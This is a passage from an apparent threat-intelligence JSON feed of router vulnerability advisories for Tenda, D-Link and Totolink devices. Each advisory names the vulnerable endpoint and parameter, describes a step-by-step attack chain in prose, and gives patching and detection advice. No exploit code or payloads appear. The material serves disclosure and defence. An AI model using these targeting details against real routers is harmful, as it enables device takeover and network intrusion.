4G300 router, version US_4G300V1.0Mt_V1.01.42_CN_TDC01, allowing an attacker to potentially execute arbitrary code by manipulating the 'page' argument to the sub_427C3C function in the /goform/SafeMacFilter file.","title":"Tenda 4G300 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7289"}],"_cs_exploited":false,"_cs_products":["DIR-825M"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","router","dlink","cve"],"_cs_type":"advisory","_cs_vendors":["D-Link"],"content_html":"\u003cp\u003eA buffer 
overflow vulnerability exists in D-Link DIR-825M router version 1.1.12. The vulnerability is located within the \u003ccode\u003esub_414BA8\u003c/code\u003e function of the \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e file. An attacker can exploit this flaw by manipulating the \u003ccode\u003esubmit-url\u003c/code\u003e argument, leading to arbitrary code execution on the device. This vulnerability is remotely exploitable, and a proof-of-concept exploit is publicly available, increasing the risk of widespread attacks. Exploitation does not require authentication by default, and could allow an attacker to gain complete control over the device. This poses a significant threat to home and small business networks relying on this router model.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-825M router running firmware version 1.1.12.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker includes the \u003ccode\u003esubmit-url\u003c/code\u003e argument in the POST request, injecting a buffer overflow payload.\u003c/li\u003e\n\u003cli\u003eThe crafted payload overflows the buffer in the \u003ccode\u003esub_414BA8\u003c/code\u003e function during the processing of the \u003ccode\u003esubmit-url\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites critical memory regions, including the return address.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003esub_414BA8\u003c/code\u003e function returns, control is redirected to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload executes arbitrary code, potentially downloading and executing a secondary payload.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell 
access to the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability allows a remote attacker to execute arbitrary code on the D-Link DIR-825M router. This can lead to complete compromise of the device, allowing the attacker to eavesdrop on network traffic, modify router settings, or use the router as a botnet node for further malicious activities. Given the widespread use of D-Link routers in home and small business networks, a successful attack could compromise a large number of devices and networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available firmware updates from D-Link to patch CVE-2026-7289.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect suspicious POST requests to \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e with overly long \u003ccode\u003esubmit-url\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to the \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T15:16:37Z","date_published":"2026-04-28T15:16:37Z","id":"/briefs/2026-04-dlink-buffer-overflow/","summary":"D-Link DIR-825M version 1.1.12 is vulnerable to a buffer overflow via manipulation of the submit-url argument in the /boafrm/formWanConfigSetup file's sub_414BA8 function, allowing a remote attacker to execute arbitrary code.","title":"D-Link DIR-825M Remote Buffer Overflow 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7151"}],"_cs_exploited":false,"_cs_products":["HG3"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7151","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda HG3 version 2.0. The vulnerability exists within the \u003ccode\u003eformUploadConfig\u003c/code\u003e function of the \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e file. A remote attacker can exploit this by manipulating the \u003ccode\u003edestNet\u003c/code\u003e argument, potentially leading to arbitrary code execution on the device. The vulnerability, identified as CVE-2026-7151, has a publicly available exploit, increasing the risk of exploitation. This poses a significant threat to users of Tenda HG3 v2.0 routers, potentially allowing attackers to gain unauthorized access and control over the device. 
The CVSS v3.1 score is rated as 8.8 (HIGH).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda HG3 v2.0 router with default or known credentials, or no authentication at all.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP POST request to \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe request targets the \u003ccode\u003eformUploadConfig\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003edestNet\u003c/code\u003e argument within the HTTP POST data is manipulated with a string exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformUploadConfig\u003c/code\u003e function processes the oversized \u003ccode\u003edestNet\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThis causes a stack-based buffer overflow, overwriting adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device by overwriting the return address or other critical data on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker can then leverage this to gain full control of the device, potentially modifying settings, injecting malware, or using it as part of a botnet.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda HG3 v2.0 router. This could lead to complete compromise of the device, allowing the attacker to monitor network traffic, change router settings, or use the device as a launchpad for further attacks against other devices on the network. 
Given the potential for widespread exploitation due to the publicly available exploit, a large number of Tenda HG3 v2.0 users are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for unusual POST requests to \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e with excessively long \u003ccode\u003edestNet\u003c/code\u003e parameters to detect potential exploit attempts (see example Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting for requests to \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply available patches or firmware updates from Tenda to address CVE-2026-7151 on vulnerable HG3 2.0 devices.\u003c/li\u003e\n\u003cli\u003eConsider deploying a web application firewall (WAF) rule to filter out malicious requests targeting the \u003ccode\u003edestNet\u003c/code\u003e parameter in \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T12:00:00Z","date_published":"2026-04-28T12:00:00Z","id":"/briefs/2026-04-tenda-hg3-overflow/","summary":"A stack-based buffer overflow vulnerability in the formUploadConfig function of Tenda HG3 v2.0's /boaform/formIPv6Routing file allows remote attackers to execute arbitrary code by manipulating the destNet argument.","title":"Tenda HG3 v2.0 Stack-Based Buffer Overflow in formUploadConfig","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-hg3-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7241"}],"_cs_exploited":false,"_cs_products":["A8000RU"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7241","command-injection","router"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7241, has been identified in Totolink A8000RU router firmware version 
7.1cu.643_b20200521. This vulnerability resides within the CGI Handler component, specifically in the \u003ccode\u003esetWiFiBasicCfg\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands by manipulating the \u003ccode\u003ewifiOff\u003c/code\u003e argument. The vulnerability has been publicly disclosed, increasing the risk of exploitation. This poses a significant threat to users of the affected router model, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request targets the \u003ccode\u003esetWiFiBasicCfg\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious OS commands into the \u003ccode\u003ewifiOff\u003c/code\u003e argument of the HTTP request.\u003c/li\u003e\n\u003cli\u003eThe CGI handler processes the request without proper sanitization of the \u003ccode\u003ewifiOff\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed by the system with the privileges of the web server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access or performs other malicious actions, such as modifying router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected Totolink A8000RU router. 
This can lead to complete compromise of the device, potentially enabling the attacker to eavesdrop on network traffic, modify router configuration, or use the router as a node in a botnet. Given the widespread use of Totolink routers, a successful attack could impact numerous home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Totolink A8000RU Command Injection Attempt\u0026rdquo; to your SIEM to identify exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u0026ldquo;Detect Suspicious CGI Request Arguments\u0026rdquo; to identify unusual commands in cgi requests.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with suspicious characters or commands in the \u003ccode\u003ewifiOff\u003c/code\u003e parameter, as this is the attack vector described in CVE-2026-7241.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T09:17:41Z","date_published":"2026-04-28T09:17:41Z","id":"/briefs/2026-04-totolink-rce/","summary":"Totolink A8000RU version 7.1cu.643_b20200521 is vulnerable to OS command injection via manipulation of the `wifiOff` argument in the `setWiFiBasicCfg` function of the `/cgi-bin/cstecgi.cgi` CGI handler, allowing a remote attacker to execute arbitrary commands on the system.","title":"Totolink A8000RU OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7248"}],"_cs_exploited":false,"_cs_products":["DI-8100"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7248","buffer-overflow","d-link","router"],"_cs_type":"advisory","_cs_vendors":["D-Link"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7248, affects the D-Link DI-8100 router, 
specifically version 16.07.26A1. The vulnerability resides within the \u003ccode\u003etgfile_htm\u003c/code\u003e function of the \u003ccode\u003etgfile.htm\u003c/code\u003e file, a component of the CGI endpoint. By crafting a malicious request targeting the \u003ccode\u003efn\u003c/code\u003e argument, a remote, unauthenticated attacker can trigger a buffer overflow, potentially leading to arbitrary code execution. This vulnerability is particularly concerning as a proof-of-concept exploit has been publicly released, increasing the likelihood of exploitation. Routers are often targeted due to their exposure to the internet and the potential to compromise entire networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DI-8100 router running firmware version 16.07.26A1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003etgfile.htm\u003c/code\u003e CGI endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes an overly long string in the \u003ccode\u003efn\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the request and passes the \u003ccode\u003efn\u003c/code\u003e argument to the \u003ccode\u003etgfile_htm\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003etgfile_htm\u003c/code\u003e function fails to properly validate the length of the \u003ccode\u003efn\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eA buffer overflow occurs when the overly long \u003ccode\u003efn\u003c/code\u003e argument is copied into a fixed-size buffer.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially allowing them to take full control of the 
device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to remotely execute arbitrary code on the D-Link DI-8100 router. This could lead to a complete compromise of the device, allowing the attacker to intercept network traffic, modify router settings, or use the router as a launchpad for further attacks against other devices on the network. Given the public availability of an exploit, widespread exploitation is possible, potentially affecting numerous home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for abnormally long \u003ccode\u003efn\u003c/code\u003e parameters in requests to \u003ccode\u003e/tgfile.htm\u003c/code\u003e using the provided Sigma rule to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on HTTP requests to the router\u0026rsquo;s web interface to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eSince the source material only identifies a vulnerability, without a patch, consider replacing the affected device.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T09:16:18Z","date_published":"2026-04-28T09:16:18Z","id":"/briefs/2026-04-dlink-di-8100-bo/","summary":"A buffer overflow vulnerability in the D-Link DI-8100 router allows remote attackers to execute arbitrary code by manipulating the 'fn' argument in the tgfile_htm function of the CGI endpoint.","title":"D-Link DI-8100 Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-di-8100-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7240"}],"_cs_exploited":false,"_cs_products":["A8000RU 
7.1cu.643_b20200521"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7240","command-injection","totolink","router","cgi"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7240, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This flaw resides within the CGI Handler component, specifically in the \u003ccode\u003esetVpnAccountCfg\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By exploiting this vulnerability, a remote attacker can inject arbitrary operating system commands by manipulating the \u003ccode\u003eUser\u003c/code\u003e argument. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat as it allows complete control of the affected device, potentially leading to network compromise and data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521 accessible via the web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003esetVpnAccountCfg\u003c/code\u003e function call with a payload injected into the \u003ccode\u003eUser\u003c/code\u003e argument. 
The payload contains OS commands to be executed on the router.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s CGI Handler processes the request without proper sanitization of the \u003ccode\u003eUser\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access to the router.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised router to pivot within the network, potentially accessing sensitive data or other internal systems.\u003c/li\u003e\n\u003cli\u003eThe attacker could modify the router\u0026rsquo;s configuration, intercept network traffic, or use it as a launching point for further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7240 allows a remote, unauthenticated attacker to execute arbitrary commands on the affected Totolink A8000RU router. This could lead to a complete compromise of the device, potentially exposing sensitive information, enabling unauthorized network access, and facilitating further attacks within the network. Given the ease of exploitation and the availability of public exploits, organizations using this router model are at high risk of experiencing significant security breaches.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Command Injection Attempt\u003c/code\u003e to identify exploitation attempts against vulnerable Totolink routers. 
Enable webserver logging to capture the necessary request data.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Malicious User Agent\u003c/code\u003e to detect potential exploit attempts based on modified User-Agent headers.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing suspicious characters or command sequences in the \u003ccode\u003ecs-uri-query\u003c/code\u003e field, indicative of command injection attempts.\u003c/li\u003e\n\u003cli\u003eGiven the public availability of exploit code, organizations using the Totolink A8000RU 7.1cu.643_b20200521 are advised to replace the device if a patch is not available from the vendor.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T08:16:02Z","date_published":"2026-04-28T08:16:02Z","id":"/briefs/2026-04-totolink-cmd-injection/","summary":"CVE-2026-7240 is a critical OS command injection vulnerability in the Totolink A8000RU router that allows remote attackers to execute arbitrary commands by manipulating the 'User' argument in the 'setVpnAccountCfg' function.","title":"Totolink A8000RU OS Command Injection Vulnerability (CVE-2026-7240)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-7219"}],"_cs_exploited":false,"_cs_products":["N300RT"],"_cs_severities":["high"],"_cs_tags":["buffer-overflow","iot","router","cve-2026-7219"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability, identified as CVE-2026-7219, has been discovered in Totolink N300RT router firmware version 3.4.0-B20250430. The vulnerability resides within the \u003ccode\u003e/boafrm/formIpQoS\u003c/code\u003e file and is triggered by manipulating the \u003ccode\u003eentry_name\u003c/code\u003e argument. 
An attacker can exploit this flaw remotely to potentially execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat to devices running the affected firmware, potentially allowing attackers to gain unauthorized access and control over the router.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a Totolink N300RT device running firmware version 3.4.0-B20250430.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/boafrm/formIpQoS\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a payload designed to overflow the buffer associated with the \u003ccode\u003eentry_name\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the malicious request, leading to a buffer overflow condition.\u003c/li\u003e\n\u003cli\u003eThe attacker overwrites adjacent memory regions, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eUpon function return, the overwritten return address is used, diverting execution flow to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use this access to modify router settings, intercept network traffic, or establish a persistent backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the Totolink N300RT device. This could lead to complete compromise of the router, enabling attackers to monitor network traffic, change DNS settings, or use the device as part of a botnet. 
Given the number of Totolink N300RT devices deployed, this vulnerability could have a widespread impact, especially for home and small business users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests targeting \u003ccode\u003e/boafrm/formIpQoS\u003c/code\u003e with unusually long \u003ccode\u003eentry_name\u003c/code\u003e parameters to detect potential exploitation attempts. Implement the Sigma rule \u003ccode\u003eDetect Suspicious Totolink FormIpQoS Requests\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eApply firmware updates as soon as they are released by Totolink to patch CVE-2026-7219.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router on other devices on the network.\u003c/li\u003e\n\u003cli\u003eConsider using a web application firewall (WAF) to filter out malicious requests targeting the router\u0026rsquo;s web interface and activate the \u003ccode\u003eDetect Large POST Requests to Router Config Pages\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T04:16:23Z","date_published":"2026-04-28T04:16:23Z","id":"/briefs/2026-04-totolink-n300rt-bo/","summary":"A remote buffer overflow vulnerability exists in Totolink N300RT 3.4.0-B20250430 via manipulation of the 'entry_name' argument in the /boafrm/formIpQoS file, potentially leading to arbitrary code execution.","title":"Totolink N300RT Buffer Overflow Vulnerability (CVE-2026-7219)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-n300rt-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7101"}],"_cs_exploited":false,"_cs_products":["F456 (1.0.0.5)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7101","buffer-overflow","router","tenda","remote-code-execution"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified 
as CVE-2026-7101, has been discovered in Tenda F456 router version 1.0.0.5. The vulnerability resides in the \u003ccode\u003efromWrlclientSet\u003c/code\u003e function within the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e file, which is part of the router\u0026rsquo;s httpd component. Successful exploitation allows remote attackers to execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat to home and small business networks using the affected Tenda router model, potentially leading to complete device compromise and unauthorized network access. The vulnerability was published on 2026-04-27 and is tracked by VulDB.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Tenda F456 router running firmware version 1.0.0.5.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes an oversized payload designed to overflow the buffer in the \u003ccode\u003efromWrlclientSet\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e process attempts to process the request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow occurs, overwriting adjacent memory regions, including critical program data and execution pointers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially including shell commands or custom malware.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves complete control of the router, potentially enabling network reconnaissance, data exfiltration, or further attacks on the local 
network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability allows a remote attacker to execute arbitrary code on the Tenda F456 router. This can lead to complete device compromise, allowing the attacker to control network traffic, modify router settings, or use the compromised device as a pivot point for further attacks within the network. Given the wide usage of Tenda routers in home and small business environments, a successful widespread exploitation could impact thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched firmware version if available from the vendor.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity targeting the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement an IPS rule to detect and block exploit attempts targeting CVE-2026-7101.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T09:19:31Z","date_published":"2026-04-27T09:19:31Z","id":"/briefs/2026-04-tenda-f456-buffer-overflow/","summary":"A buffer overflow vulnerability in Tenda F456 version 1.0.0.5 allows remote attackers to execute arbitrary code via a crafted request to the fromWrlclientSet function in the /goform/WrlclientSet file of the httpd component.","title":"Tenda F456 Router Buffer Overflow Vulnerability 
(CVE-2026-7101)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f456-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7081"}],"_cs_exploited":false,"_cs_products":["F456"],"_cs_severities":["critical"],"_cs_tags":["cve","buffer_overflow","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7081, affects Tenda F456 router version 1.0.0.5. The vulnerability resides in the \u003ccode\u003efromGstDhcpSetSer\u003c/code\u003e function within the \u003ccode\u003e/goform/GstDhcpSetSer\u003c/code\u003e file, a component of the device\u0026rsquo;s httpd service. Successful exploitation allows a remote attacker to execute arbitrary code on the device. Publicly available exploit code increases the risk of widespread exploitation. This vulnerability poses a significant threat as it can lead to complete compromise of the affected device, potentially allowing attackers to gain unauthorized access to the network, steal sensitive information, or use the device as part of a botnet.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda F456 router (version 1.0.0.5) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/GstDhcpSetSer\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes the \u003ccode\u003edips\u003c/code\u003e argument, which is intentionally oversized to trigger the buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003efromGstDhcpSetSer\u003c/code\u003e function processes the request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003edips\u003c/code\u003e argument overwrites adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker 
carefully crafts the overflow to overwrite the return address with an address pointing to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromGstDhcpSetSer\u003c/code\u003e function returns, causing execution to jump to the attacker\u0026rsquo;s code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes with the privileges of the httpd process, potentially leading to full device compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda F456 router. This can result in complete device compromise, including the ability to modify device settings, intercept network traffic, and potentially use the compromised device as a pivot point for further attacks within the network. Given the widespread use of Tenda routers, a large number of devices could be vulnerable, making this a significant security concern.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/GstDhcpSetSer\u003c/code\u003e with unusually long \u003ccode\u003edips\u003c/code\u003e parameter values to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u003ccode\u003eDetect Tenda F456 Buffer Overflow Attempt\u003c/code\u003e to identify malicious HTTP requests.\u003c/li\u003e\n\u003cli\u003eSince no patch is available, consider replacing the affected Tenda F456 routers (version 1.0.0.5) with more secure alternatives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T04:16:09Z","date_published":"2026-04-27T04:16:09Z","id":"/briefs/2026-04-tenda-f456-bo/","summary":"A buffer overflow vulnerability exists in Tenda F456 version 1.0.0.5 in the `fromGstDhcpSetSer` function, allowing remote attackers to 
